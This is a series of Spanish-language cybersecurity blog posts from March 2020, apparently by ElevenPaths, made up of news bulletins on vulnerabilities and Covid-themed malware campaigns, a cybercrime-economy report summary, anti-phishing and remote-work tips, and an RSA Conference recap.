ha detectado que existen dos fallos RCE en la librería de parseo de fuentes Adobe Type Manager, encargada de renderizar las tipografías PostScript en los sistemas Windows. Para explotar esta vulnerabilidad, un atacante podría construir una fuente en formato PostScript Adobe Type 1 que, al abrirse o previsualizarse el documento que la contiene, desencadenaría la ejecución de código. Microsoft ha publicado una serie de mitigaciones para estas vulnerabilidades, que afectan a todas las versiones de Windows. Toda la info: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200006 Vulnerabilidad en iOS impide el cifrado de tráfico VPN Se ha encontrado una vulnerabilidad en la versión 13.3.1 de iOS que impide que las VPNs cifren todo el tráfico. En la versión actual de iOS, el sistema operativo no cierra las conexiones existentes, lo que podría dar lugar a que los datos de los usuarios quedasen expuestos si las conexiones afectadas no estuvieran cifradas por sí mismas. Un atacante podría ver tanto la dirección IP de los usuarios como la de los servidores a los que se están conectando. Además, el servidor al que se conecta podría ver la verdadera dirección IP en lugar de la del servidor VPN. Apple todavía no ha publicado una solución para este fallo. Más aquí: https://protonvpn.com/blog/apple-ios-vulnerability-disclosure/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
27 de marzo de 2020
Dark Commerce, un informe de ElevenPaths y Blueliv sobre la industria del cibercrimen
El cibercrimen es una industria con una creciente economía de servicios, herramientas para la subcontratación, proveedores de servicios, canales y usuarios finales. Desde ElevenPaths nos hemos unido a la iniciativa de Blueliv para investigar este fenómeno y realizar un detallado informe al respecto, descubre en este post los puntos más destacados. Cibercrimen, una industria en crecimiento El tamaño de esta economía sumergida está creciendo. Los ciberdelincuentes de diferentes niveles de experiencia pueden adquirir las herramientas necesarias para lanzar una campaña maliciosa diseñada para atacar a empresas, gobiernos e individuos. Es importante comprender cómo utilizan los atacantes estas herramientas y servicios para ayudar a las organizaciones a preparar las defensas y proteger sus activos. Para ello: Crear un perfil completo de los threat actors Analizar tendencias y patrones entre diferentes servicios utilizados Defenderse de los ataques dirigidos El primer informe de esta serie cubre los primeros elementos de esta industria: la adquisición de código malicioso y su preparación para una campaña. Cómo obtienen el malware los ciberdelincuentes Existen, a grandes rasgos, tres maneras de obtener el código malicioso: Escribiendo su propio código Ventajas: se apropian de la campaña entera y pueden aprender de otros threat actors. Desventajas: es más laborioso, se necesitan habilidades específicas y los threat actors participan tanto en la parte operativa como en el desarrollo. Contratando desarrolladores Ventajas: los servicios de consultoría pueden ofrecer los conocimientos de otros threat actors y desarrollar el código a medida según los requisitos. Desventajas: es más costoso, se requiere un alto nivel de interacción entre los proveedores y los clientes y, además, existen cargos ocultos por mantener la privacidad del proyecto. Malware as a Service (MaaS) Ventajas: es fácil de buscar, con amplia diversidad de productos listos para utilizar y no es necesario un gran conocimiento técnico. Desventajas: el código no se puede modificar y, en ocasiones, puede ser detectado por los antivirus. Malware disponible más popular Los programas maliciosos más populares son los siguientes: Information stealers Banking Trojans Ransomware CC Sniffers Cryptojackers Phishing Kits PoS malware Los precios de los códigos maliciosos aumentan dependiendo de los objetivos, los sistemas operativos de destino, la funcionalidad y la versión del malware. Existen descuentos disponibles en algunos tipos de malware para dividir las ganancias por su uso entre los usuarios y los desarrolladores. Evadir la detección Ha habido un aumento en la popularidad del malware que incluye una gama de ofuscación, detección de sandbox y técnicas de bypass. Estos son las herramientas y servicios más utilizados en todos los tipos de malware: Packers: comprime los ejecutables maliciosos Crypters: encripta los ejecutables maliciosos Ofuscador: oculta, esconde o disfraza el código fuente. Muchos se consideran herramientas legítimas Firma de código: solicitudes que llevan una firma oficial para confimar la integridad de la solicitud; identificar al autor del código Pruebas de antivirus y evasión de listas negras Los productos e infraestructura de malware finalizados deben ser probados antes de su despliegue. Suele hacerse de la siguiente manera: Mediante escáneres de antivirus no distribuibles: los usuarios pueden probar los archivos, URLs, dominios y direcciones IP contra las protecciones de seguridad sin distribuir los elementos que escanean para proveedores de seguridad. Los escaneos estáticos prueban el malware en los productos AV y generan informes. Los análisis dinámicos, en cambio, despliegan adicionalmente el malware y proporcionan análisis durante el tiempo de ejecución. Esto permite hacer cambios en la infraestructura, ajustar los productos antes del lanzamiento y mejorar la robustez de las herramientas. ¿Cómo enfrentarse a la industria del cibercrimen? Para enfrentarse con éxito a esta creciente industria, nuestros consejos son: Establecer programas de educación para la empresa Mantener una "ciber higiene" continua Colaborar entre los diferentes sectores de la ciberseguridad Utilizar el talento adecuado para el negocio Servirse de inteligencia de amenazas especialmente dedicada Agradecer a Blueliv la elaboración de este interesante análisis. Informe completo ya disponible a continuación:
24 de marzo de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad especial Covid-19
Covid-19 – Ataques confirmados El pasado 13 de marzo, el Hospital Universitario de Brno en la Republica Checa, sufrió un ataque que ocasionó el apagado de los sistemas informáticos, demorando los resultados de pruebas sobre casos del COVID 19, y de que, por el momento se desconocen las causas. Por otro lado, dos días más tarde, el 15 de marzo, el Departamento de Salud de Estados Unidos sufrió un ataque de DDoS en sus sistemas informáticos que no logró ralentizar significativamente los sistemas. Según el secretario de salud estadounidense, Alex Azar, no hubo intrusión en las redes internas y se sospecha que un estado extranjero podría estar detrás del incidente. Covid-19 – Suplantaciones confirmadas El Centro de Salud Pública del Ministerio de Salud de Ucrania fue suplantado en una campaña de phishing adjuntos maliciosos que incluían información sobre las últimas noticias sobre el Covid-19 en el país y que desencadenaron incidentes graves en el país. También, dentro de las frecuentes suplantaciones de la OMS que vienen siendo habituales durante esta crisis, es destacable la suplantación del Director General de la Organización Mundial de la Salud, en una campaña de phishing con adjuntos que contienen supuestas instrucciones acerca de medicamentos contra el Covid-19 pero que en realidad mediante un ejecutable cure exe desplegará el keylogger HawkEye capaz de robar datos de clientes de email como Firefox, Thunderbird Postbox SeaMonkey WaterFox o PaleMoon. Covid-19 – Malware & Ransomware Desde el inicio de la crisis sanitaria venimos viendo cómo los distintos agentes amenaza están utilizado diferentes herramientas maliciosas contra los ciudadanos. Destaca la distribución de: Trickbot: a través de campañas de phishing donde se suplanta a la OMS con documentos Word maliciosos. FormBook: a través de campañas de phishing donde se suplanta a la OMS con documentos PDF maliciosos con el ejecutable GuLoader en .zip. Kpot: a través de la suplantación del sitio web wisecleaner.com y que se trata de una primera fase para el posterior despliegue del ransomware CoronaVirus. Royal Road: a través de ficheros de Word embebidos en ficheros RTF que se valen de vulnerabilidades en Office para instalar un RAT. BlackWater: a través de ficheros .rar que comprimen supuesta información acerca del Covid-19. Covid-19 – Aplicaciones maliciosas Son varios los aplicativos desarrollados con fines maliciosos aprovechando el exceso de información relacionado con la pandemia, destacando: CovidLock - App móvil que se ofrece con la función de realizar un seguimiento en tiempo real de afectados por Coronavirus. Al instalarse solicita varios permisos como ejecutarse en segundo plano, tener acceso a la pantalla de bloqueo o utilizar las funcionalidades de accesibilidad de Android con el fin de tener permisos de administrador de sistema y tomar el control del dispositivo como un ransomware solicitando un pago para recuperar la funcionalidad del dispositivo y amenazando con enviar fotos y vídeos comprometidos a la lista de contactos en caso de no cumplir con el pago Corona-Virus-Map[.]com - Mapa interactivo que muestra estadísticas de infecciones, recuperaciones y fallecimientos por país y que pretende la distribución del malware AZORult. Covid-19 – Participación de APTs El panorama mundial favorece el aprovechamiento de la situación también por parte de algunas de las organizaciones cibercriminales más destacadas: APT36 / APT27 / TA505: mediante campañas de phishing. APT28 (aka Fancy Bear o Vicious Panda): mediante campañas de phishing que se han detectado por el momento contra el sector público de Mongolia. Ancient Tortoise: mediante campañas de phishing que estarían suplantando al sector bancario aprovechando la temática del Covid-19. Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
23 de marzo de 2020
Cómo detectar y protegerse de los ataques de phishing en tiempos de coronavirus
La sobreinformación provocada por la enorme cantidad de noticias que nos llegan sobre el coronavirus hace más difícil distinguir los correos verdaderos de los falsos. Ésto supone un gran riesgo para la seguridad de las personas, ya que puede conducir a la descarga de malware que los ciberatacantes pueden utilizar para acceder a los datos de sus víctimas y robar su identidad, provocando catástrofes económicas e incluso en su salud. En el peor de los casos, un correo de phishing podría tener consecuencias mortales. El número de afectados por el COVID-19 es abrumador y aumenta cada día. Sabemos que esta enfermedad está provocando consecuencias nefastas a nivel social y económico en todo el mundo y debemos seguir las recomendaciones e imposiciones de las autoridades para tratar de frenar su expansión. De la misma manera, hemos de tomar medidas para protegernos de las ciberamenazas que igualmente pueden afectarnos de manera individual y colectiva. Tipos de correos de phishing del coronavirus Los correos electrónicos de phishing sobre el coronavirus, al igual que los de cualquier otra temática, pueden aparecer en diferentes formas: Alertas del Ministerio de Sanidad. Los ciberdelincuentes envían correos en los que se hacen pasar por organizaciones legítimas (organizaciones gubernamentales, sanitarias, grandes empresas, etc.), enlazando, por ejemplo, una URL con una lista de casos de coronavirus en tu región. ¡No pinches en el enlace y elimínalo! Correos electrónicos con consejos de salud. Los phishers también ofrecen supuestos consejos o soluciones para protegerse contra el coronavirus. Estos correos electrónicos pueden afirmar ser expertos médicos chinos, donde comenzó el brote de coronavirus, por ejemplo. Correos electrónicos sobre políticas de trabajo. Es posible que recibas correos de phishing no sólo en tu cuenta de correo personal sino también en la corporativa, haciéndose pasar por una empresa conocida o incluso por la empresa para la que trabajas. En este caso comprueba bien el dominio del remitente porque el enlace contendrá malware. Consejos para detectar y evitar correos de phishing Ten mucho cuidado cuando te soliciten información personal en línea. Las instituciones gubernamentales no piden números de la seguridad social ni otro tipo de datos personales así como así. Nunca contestes a estos correos ni proporciones ningún tipo de información personal. Otros correos de phishing consisten en anuncios que aseguran tener un tratamiento o cura para el coronavirus. Normalmente, estos anuncios tratan de crear una sensación de urgencia, con ofertas limitadas o estableciendo un límite temporal para conseguir los productos. Lo que tienes que hacer es simplemente eliminarlos, porque al hacer click en ellos pueden ocurrir dos cosas: Descargar software malicioso en tu dispositivo. Comprar el producto y no recibirlo, es decir, que roben tu dinero e información personal como tu nombre, dirección y tarjeta de crédito. Analiza cómo se dirigen a ti. Los correos de phishing normalmente se hacen mediante envíos masivos, por lo que no suelen utilizar tu nombre ni son personalizados en cuanto al contenido. Fórmulas genéricas como “Estimado señor o señora” indican que probablemente estés ante una estafa. Comprueba los enlaces y las direcciones de correo electrónico. Para inspeccionar un enlace, para el ratón por encima de la URL y aparecerá un recuadro que mostrará el sitio al cual se dirige. En cuanto a las direcciones de correo electrónico, fíjate minuciosamente en todo lo que contienen y analiza en el dominio (lo que va a continuación del “@”), búscalo en internet, etc. Ten cuidado con los errores ortográficos y gramaticales. Puede parecer una tontería, pero normalmente los correos legítimos no contienen ningún error gramatical ni faltas de ortografía, o muy muy pocas. Si encuentras demasiadas, elimínalo. ¿Dónde encontrar información fiable acerca del coronavirus? Acude siempre a portales del gobierno y de instituciones sanitarias certificadas y sé selectivo en tus búsquedas, contrastando información. El Ministerio de Sanidad ha abierto un portal para proporcionar información sobre el coronavirus: https://www.mscbs.gob.es/profesionales/saludPublica/ccayes/alertasActual/nCov-China/home.htm También puedes encontrar un apartado en la página web de tu comunidad autónoma donde enterarte de las medidas concretas que se están llevando a cabo en tu región. Recuerda que si eres cliente de Movistar puedes activar aquí Conexión Segura, un servicio desarrollado por ElevenPaths y Telefónica España junto con McAfee y Allot que bloquea, al instante y de forma preventiva, las amenazas de malware y fraude puedas encontrarte cuando navegues por la red con tus dispositivos.
19 de marzo de 2020
10 tips para un teletrabajo seguro en tu empresa
En situaciones en las que el teletrabajo sea posible o incluso necesario, como en el caso de la pandemia del coronavirus, hemos de tener en cuenta que los sistemas de seguridad que se utilizan en los centros de trabajo de las empresas pasan a depender en gran parte de las redes de las que disponen los trabajadores y trabajadoras en sus casas. Por ello, te contamos las medidas que debes llevar a cabo para que el teletrabajo sea seguro tanto para tu empresa como para tus empleados y clientes: Implementa una solución de VPN confiable, tanto desde el lado del Servidor como del lado del Cliente. Evita en lo posible, utilizar servicios de acceso remoto que dependan de un tercero o un proveedor para conectarte entre tus clientes y tus servidores. Controla los accesos remotos a través de la VPN a tu empresa mediante la detección de equipos que no cumplan con las políticas de seguridad que hayas definido y, mediante algún tipo de tecnología, aísla los dispositivos que no cumplan con ellas hasta que solucionen los puntos de mejora. Durante esta pandemia a la que nos enfrentamos en el mundo entero, muchas empresas tienen a gran parte de su personal con trabajo remoto, por lo cual, la disponibilidad de los servicios se hace vital para el desarrollo de nuestro trabajo. Los cibercriminales también lo saben y son conscientes de que un ataque de Denegación de Servicios en estos momentos puede tener efectos mucho más caóticos que los de costumbre. Habilita los servicios de Anti-DDoS tanto en tus webservers como en tu red. Valida la capacidad de los canales y las configuraciones de los servidores para que tus empleados puedan conectarse de forma estable a los servicios de la empresa. Asegúrate de que, dentro de lo posible, no tengan una mala experiencia, pero por sobre todo, de que no les muestres mensajes contradictorios con tus consejos de seguridad. Por ejemplo, si le dices que no ingresen a portales sin certificados digitales válidos, asegúrate de que las plataformas que pones a disposición para ellos, los tengan. Si nunca has realizado pruebas de seguridad a tus portales, quizás sea un buen momento para hacerlo con soluciones como VAMPS. Los cibercriminales están trabajando arduamente para perjudicar a las empresas sabiendo que no tienen la capacidad de monitorear todo lo que sucede en sus portales. Si aún no tienes contratado servicios de SOC, quizás sea un buen momento para hacerlo. Tener profesionales brindando soporte y monitorización 24/7 en una época como ésta es una gran ventaja cuando de repente tienes tantos usuarios remotos conectados a tu infraestructura. Recuerda asegurar las plataformas de teletrabajo y videoconferencia, porque son otro vector que buscan los atacantes para realizar intrusiones a tu empresa. Nosotros tenemos investigaciones y herramientas que lo demuestran, te invitamos a revisar nuestro blog donde las analizamos. Si los empleados tienen teléfonos de la empresa, intenta implementar un MDM para ayudarlos a mantener seguros y confiables sus dispositivos. En tareas remotas, el tiempo es valioso, con lo cual, intenta utilizar herramientas de planificación y seguimiento de tareas en los equipos de trabajo, como Teams, Slack, entre otros. Puedes revisar los recursos que estaremos publicando en nuestra cuenta de Twitter. Recuerda que para mantener las reuniones y la productividad con tu organización es fundamental tener y usar las herramientas de ofimática que te permiten hacer videoconferencias o llamadas grupales o poder trabajar en grupo. La mayoría de Suite ofimáticas como Microsoft OneDrive tienen éstas inmersas dentro de sus servicios.
18 de marzo de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 9-13 de marzo
Vulnerabilidad crítica en el protocolo SMBv3 Cisco Talos y Fortinet han publicado detalles sobre una vulnerabilidad crítica (CVE-2020-0796, CVSSv3 10) de ejecución remota de código en el protocolo Microsoft Server Message Block 3.1.1 (SMBv3) que podría ser aprovechada por un atacante para conseguir la ejecución de código en el contexto de una aplicación mediante el envío, sin autenticación previa, de un paquete malicioso comprimido. Esta vulnerabilidad, que empieza a ser conocida como SMBGhost, se produce debido a un problema en el procesamiento de ciertas peticiones en la versión 3 del protocolo SMB que, en principio, solo afectaría a las versiones más recientes de Windows (Windows 10 y Windows Server v.1903 y v.1909). Su divulgación parece haberse producido de forma inintencionada al eliminarla Microsoft de forma tardía de su boletín de seguridad de marzo, lo que ha provocado que la empresa tenga que emitir un parche adicional solo para este caso. Esta vulnerabilidad es susceptible de ser utilizada para la distribución de malware con capacidades de gusano al igual que ya ocurrió con WannaCry o NotPetya. Por ello, distintos investigadores ya han desarrollado pruebas de concepto funcionales para conseguir la denegación de servicios o el escalado local de privilegios. Por el momento, no se ha publicado el código de los mismos pero es de esperar que, tras la actualización, se desvelen estos y nuevos detalles que puedan generar un exploit que consiga la ejecución remota de código. Para facilitar la identificación de aquellos sistemas vulnerables (en principio, Windows 10 y Server en versión 1903 y 1909) también se ha publicado software pare realizar escaneos de forma independiente. Se estima que cerca de 48000 sistemas expuestos a internet son vulnerables a SMBGhost, según datos de Kryptos Logic. Más información en: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796 Boletín de actualizaciones de Microsoft Microsoft publicó el pasado martes su boletín mensual de actualizaciones de seguridad conocido como Patch Tuesday. Este mes la compañía ha parcheado 115 vulnerabilidades de las cuales 26 han sido catalogadas como críticas, 88 como importantes y 1 como moderada. Entre las vulnerabilidades corregidas destacan las siguientes: CVE-2020-0684: "Vulnerabilidad de ejecución de código remoto LNK", se trata de un error en los archivos de acceso directo LNK de Windows que permite que el malware ejecute código en un sistema cuando el sistema operativo Windows procesa un archivo LNK malicioso. CVE-2020-0852: "Vulnerabilidad de ejecución remota de código de Microsoft Word", esta vulnerabilidad permitiría a un atacante crear documentos de Word maliciosos que ejecuten código simplemente abriéndolos. Este error, además, funciona en el panel de vista previa de Outlook. Información completa: https://portal.msrc.microsoft.com/en-us/security-guidance Coronavirus como pretexto de nuevas campañas infecciosas Como se viene observando desde que comenzó la epidemia del coronavirus o COVID-19, son numerosos los agentes maliciosos que están valiéndose de ésta para realizar campañas fraudulentas. Es el caso de la página web www[.]Corona-Virus-Map[.]com, que aparentemente contiene un mapa mundial que muestra estadísticas de infecciones, recuperaciones y fallecimientos por país producidos como efecto de esta causa, estaría infectando a sus víctimas con el malware AZORult, reponsable de exfiltrar información como credenciales, datos de tarjetas bancarias y cookies entre otros. También esta semana, el equipo de MalwareHunterTeam ha descubierto lo que han denominado como “ransomware Coronavirus” debido a que crea una nota de rescate bajo el nombre “coronavirus”, renombrando además la unidad C: del ordenador a Coronavirus; destaca que junto a este también se distribuye el troyano Kpot. Por otro lado, los gestores del malware Hancitor han vuelto a lanzar una campaña esta semana de spam utilizando la temática de la contratación de un seguro para el COVID-19. Finalmente, Check Point Research descubrió también esta semana una campaña para distribuir un nuevo malware contra el sector público de Mongolia, el cual utiliza supuestos documentos del Ministerio de Relaciones Exteriores de Mongolia informando de nuevas infecciones por Coronavirus. Toda la información: https://blog.reasonsecurity.com/2020/03/09/covid-19-info-stealer-the-map-of-threats-threat-analysis-report/ Microsoft Office Word distribuye el malware Trickbot Investigadores de FortiGuard Labs han encontrado y analizado una muestra de MS Office Word que estaría distribuyendo una nueva variante de TrickBot. Como viene siendo habitual en estos casos, el Word malicioso solicita habilitar las macros para que la infección pueda comenzar. Tras esto, se ejecuta la macro en VBA, la cual extrae dos archivos en el equipo de la víctima con formato .bat y .jse. Tras ejecutarse el código JavaScript, este obtiene todos los procesos en ejecución y realiza una serie de comprobaciones para verificar que es un entorno real. Después, se descarga el payload de TrickBot desde el servidor controlado por el atacante y se inicia a través del JavaScript. Además, copia el archivo JavaScript en la carpeta de inicio de Windows para que pueda iniciarse cada vez que se inicie el equipo de la víctima. Información completa: https://www.fortinet.com/blog/threat-research/new-variant-of-trickbot-being-spread-by-word-document.html Nueva versión del propagador de Emotet Investigadores de Binary Defense han analizado la propagación de Emotet a través de redes WiFi. Entre sus conclusiones, se ha descubierto que el propagador del malware ha evolucionado, puesto que se ha observado una nueva versión que habría cambiado de un programa autónomo a un módulo completo de Emotet con algunas mejoras de funcionalidad. Además, en lugar de incluir el loader de Emotet en el propio propagador, en esta edición se descarga de un servidor. Cabe destacar que los cambios presentados no afectan a la funcionalidad clave del malware, pero sí que aumentan la capacidad de obtención de información del mismo debido a que se obtienen más detalles de depuración y de los logs de aquellas máquinas infectadas gracias a un nuevo protocolo de comunicación. Este nueva versión dificulta las tareas de los sistemas de seguridad al evitar la detección basada en buscar y marcar el loader de Emotet. Más información: http://blog.ptsecurity.com/2020/03/intelx86-root-of-trust-loss-of-trust.html Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
13 de marzo de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 2-6 de marzo
Ghostcat: Vulnerabilidad RCE en Apache Tomcat Investigadores de seguridad de Chaitin Tech han descubierto una vulnerabilidad crítica RCE en el conector AJP de Apache Tomcat. Este está habilitado por defecto en todos los servidores Tomcat en el puerto 8009. La vulnerabilidad, catalogada como CVE-2020-1938 CVSS 9.8 y denominada Ghostcat por sus descubridores, existe debido a una validación incorrecta en el conector AJP. Un atacante remoto podría enviar una solicitud AJP especialmente diseñada para introducir el payload y permitir la ejecución de código arbitrario en el sistema objetivo. De ser explotado con éxito, el fallo podría dar lugar al acceso total del sistema atacado. Actualmente ya se han publicado parches para las versiones 7, 8 y 9 a las que se recomienda actualizar. Tan sólo unos días después de conocerse la vulnerabilidad, investigadores de seguridad advertían de la detección de un auge en los escaneos de la vulnerabilidad. Información completa: https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E Let's Encrypt revocará certificados por un fallo en el registro CAA Let's Encrypt revocó desde el 4 de marzo de 2020 un total de casi tres millones de certificados X509 debido a un fallo en su software de emisión de certificados. El problema en cuestión está relacionado con el software Boulder e implicaba un procesamiento inadecuado del registro CAA del dominio para el que se emitía el certificado. En concreto, el fallo permitía que se emitieran certificados para un dominio durante 30 días incluso si el registro CAA prohibía que Let’s Encrypt emitiera dichos certificados. Let's Encrypt considera muy poco probable que un atacante haya podido explotar la vulnerabilidad, pero ha notificado a los sitios afectados de su decisión de revocar los certificados. Se calcula que el problema tendría impacto en 3 millones de los 116 millones de certificados TLS emitidos por la empresa. Unos días más tarde, se publicaba en GitHub un listado de host que podrían ver su certificado revocado. Info completa: https://community.letsencrypt.org/t/revoking-certain-certificates-on-march-4/114864 Robo de copias de seguridad en la nube en campañas de ransomware Una de las medidas de seguridad más utilizadas y efectivas contra los ciberataques con ransomware es realizar copias de seguridad frecuentes de los sistemas. La gestión de estas copias suele realizarse con software corporativo dedicado, como puede ser Veeam. Los agentes maliciosos detrás de ciberataques por ransomware, tales como DoppelPaymer y Maze, estarían utilizando las copias de seguridad en contra de las víctimas, de manera que los atacantes dan prioridad al acceso al almacenamiento de estas con el fin de, posteriormente, robar dichas copias almacenadas en la nube, evitando ser detectados por los sistemas de seguridad de la víctima al expandir las copias en servidores propios. Tras la ejecución de esta técnica, los atacantes borrarían cualquier copia de seguridad antes de pasar a cifrar los equipos en las redes infectadas, consiguiendo un compromiso más grave dado que se pierde la opción de recuperación. Más: https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/ Vulnerabilidades en routers Netgear Netgear publicó este martes una serie de advertencias alertando de vulnerabilidades que afectan a una docena de sus routers. PSV-2019-0076 – Error crítico de ejecución remota de código, que podría permitir que un atacante no autenticado tomase el control de su hardware Wireless AC Router Nighthawk (R7800) y que ejecute versiones de firmware anteriores a 1.0.2.68. PSV-2018-0352 – Vulnerabilidad de gravedad alta de inyección de comando post-autenticación que afecta al modelo de router R7800, junto con otros 29 modelos dentro de la familia de hardware Netgear D6000, R6000, R7000, R8000, R9000 y XR500. PSV-2019-0051 – Fallo de inyección de comandos post-autenticación de gravedad alta que afecta a cinco modelos de routers pertenecientes a las SKU R6400, R6700, R6900 y R7900 que estén ejecutando un firmware vulnerable específico. Todos los detalles: https://threatpost.com/critical-netgear-bug-impacts-nighthawk-router/153445/ Google parchea vulnerabilidad en chips MediaTek Google ha parcheado una vulnerabilidad de severidad alta presente en los chips de MediaTek, principal fabricante taiwanés de chips para smartphones, tabletas, routers e incluso televisiones, que afecta a millones de dispositivos. Esta fallo (CVE-2020-0069) ha sido parcheado en el boletín de seguridad de Android de marzo, pero llevaría latente desde abril de 2019. Para explotar este fallo, solamente sería necesario ejecutar un script malicioso en el dispositivo vulnerable que permitiría al atacante obtener acceso como usuario root, tomando el control total del dispositivo. La mayoría de los dispositivos afectados tienen versiones antiguas de Android que ya no reciben actualizaciones oficiales de Google, por lo que corregir esta vulnerabilidad depende de los fabricantes de los dispositivos afectados. Más información: https://www.xda-developers.com/mediatek-su-rootkit-exploit/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita el canal de Telegram CyberSecurity Pulse aquí. Para más información visita https://empresas.blogthinkbig.com/elevenpaths/ o https://cybersecuritypulse.e-paths.com.
6 de marzo de 2020
Ciberseguridad y negocio: ElevenPaths en la RSA Conference 2020
Ya estamos de vuelta de la RSA Conference 2020, el año en el que la humanización de la tecnología ha sido el referente del sector. Ya lo avecinábamos el año pasado con nuestra apuesta bajo el lema #HumanizingSecurity, durante esta edición, ha sido la propia organización de la conferencia la que ha destacado la presencia del elemento humano en la gestión de la seguridad de las empresas. La conferencia, que se ha celebrado del 24 al 27 de febrero en San Francisco, ha coincidido con la situación de alerta provocada por el famoso virus conocido como Covid-19, que ha provocado la cancelación de diversos eventos en estas mismas fechas. Sin embargo, la situación no ha sido un problema para la organización de la RSA Conference, pues la gran conferencia anual de ciberseguridad se ha celebrado de forma natural a pesar de la retirada de algunas grandes empresas como IBM, AT&T y Verizon. Según datos recogidos por la organización, esta situación excepcional apenas ha repercutido en la asistencia y celebración del evento. Participación de Telefónica Desde Telefónica tampoco ha afectado esta situación, participando con normalidad por cuarta vez consecutiva en la XXIX edición de este gran evento de referencia mundial del sector de la seguridad. Concentrar en un mismo lugar y durante una semana a perfiles tan diferentes impulsa a Telefónica a trasladar a un equipo multidisciplinar que estuvo presente toda la semana. Desde responsables del área global de ElevenPaths (Go to Market, Producto, Go to Customer, Alianzas, CEO’s Office y Marketing y Comunicación, entre otros), responsables de seguridad de las principales OBs del grupo España, Brasil, UK, Francia, Chile, México y Argentina) responsables de producto, ventas y marketing del equipo de Telefónica USA así como responsables de las áreas de seguridad interna. Además, como punto diferencial frente a otros años, contamos con la presencia y el apoyo de dos miembros destacados de la estructura directiva de Telefónica (José Cerdán y Antonio Marti, CEO y COO de Telefónica Tech respectivamente). Conoce la propuesta de ElevenPaths Empezamos por el estand, este año renovado con los colores de la nueva identidad de marca de ElevenPaths, la Unidad de Ciberseguridad de Telefónica, que ha liderado el diseño de todas las piezas. RSA Conference: Booth South #1459 Moscone Center El estand ha sido el punto de encuentro idóneo para crear nuevas relaciones y estrechar las existentes con clientes, socios estratégicos fabricantes y analistas todas las nacionalidades. Además, todos los asistentes a la conferencia que nos visitaron pudieron disfrutar de las sesiones preparadas por los responsables de producto y alianzas del equipo de ElevenPaths, empresas participadas por Telefónica y start ups de seguridad impulsadas por Wayra que presentaron sus propuestas de seguridad. Como comentábamos, uno de los principales temas de la conferencia ha sido la inclusión del elemento humano, y nuestra estrategia está completamente alineada con este concepto. No es casualidad que volvamos a recalcar nuestra apuesta por humanizar la seguridad, apostando por una seguridad que va mucho más allá de la tecnología. Como proveedor inteligente de servicios de seguridad gestionados (iMSSP), nuestras tecnologías se ven mejoradas gracias a las personas que la gestionan, estando disponibles siempre que nos necesiten (“There when you need us”). Vicente Segura durante su charla sobre Seguridad IoT Entre las principales sesiones, una de las más destacadas fue la impartida por Vicente Segura, Head of IoT y OT de Telefónica, en la que presentó los diferentes proyectos de seguridad para el creciente mercado de Internet of Things en los que estamos trabajando. Esta charla, así como el resto de sesiones impartidas, coincidieron con varios de los principales temas más tratados en la conferencia, dado que, por primera vez, la agenda general de sesiones plenarias incluyó temas sobre la convergencia de la seguridad de TI y OT, así como sesiones centradas en producto y herramientas de código abierto (diseño de la interfaz de usuario, inteligencia artificial, privacidad y centros de operaciones de seguridad) . Otra sesión que tuvo mucha expectación fue “Coronavirus: From health and beyond”, en la que nuestra compañera Helene Aguirre, del área global de ElevenPaths, presentó un análisis de la conversación generada en torno al famoso virus en las redes sociales. Para lo que utilizó la herramienta Aldara (gestionada por el servicio de ciberamenazas, VERO), analizando el comportamiento del virus desde el primer día que se anunció y explicó las diferentes comunidades que se han creado desde entonces. Por otro lado, desde un punto de vista de negocio, destacamos los avances con clientes no solo locales, sino del resto del mundo, especialmente europeos, con los que tuvimos la oportunidad de presentarles en detalle la oferta y el alcance global de nuestros servicios, los avances tecnológicos que estamos implementando y los desafíos que tenemos en un futuro muy cercano. Conocer sus inquietudes en detalle, en un entorno del sector, ha reforzado nuestro posicionamiento como consultores dado que ha sido posible compartir sinergias y estrechar lazos con fabricantes que resuelven sus necesidades. A modo de resumen, nuestra experiencia en San Francisco ha tenido un triple efecto: Celebración de un gran número de reuniones con key players del sector, desde clientes y fabricantes hasta analistas, estrechando y mejorando nuestras relaciones. Posicionarnos como consultores estratégicos de seguridad ofreciendo nuestro servicio inteligente de gestión de seguridad (iMSSP). Compartir sinergias entre los compañeros de seguridad de los diferentes países con el objetivo de aunar fuerzas para los próximos desafíos de la compañía. En definitiva, una gran experiencia que, año tras año, nos sirve para seguir escalando en este creciente sector. Ya estamos preparando nuestra participación para el año que viene, por lo que te esperamos verte por allí.¡Hasta la próxima! CYBER SECURITY ElevenPaths en la RSA Conference 2020, el evento referencia en ciberseguridad 21 de febrero de 2020 CYBER SECURITY TheTHE: The Threat Hunting Environment en la RSA 25 de febrero de 2020
6 de marzo de 2020
#NoticiasCiberseguridad: Boletín de ciberseguridad semanal 24-28 de febrero
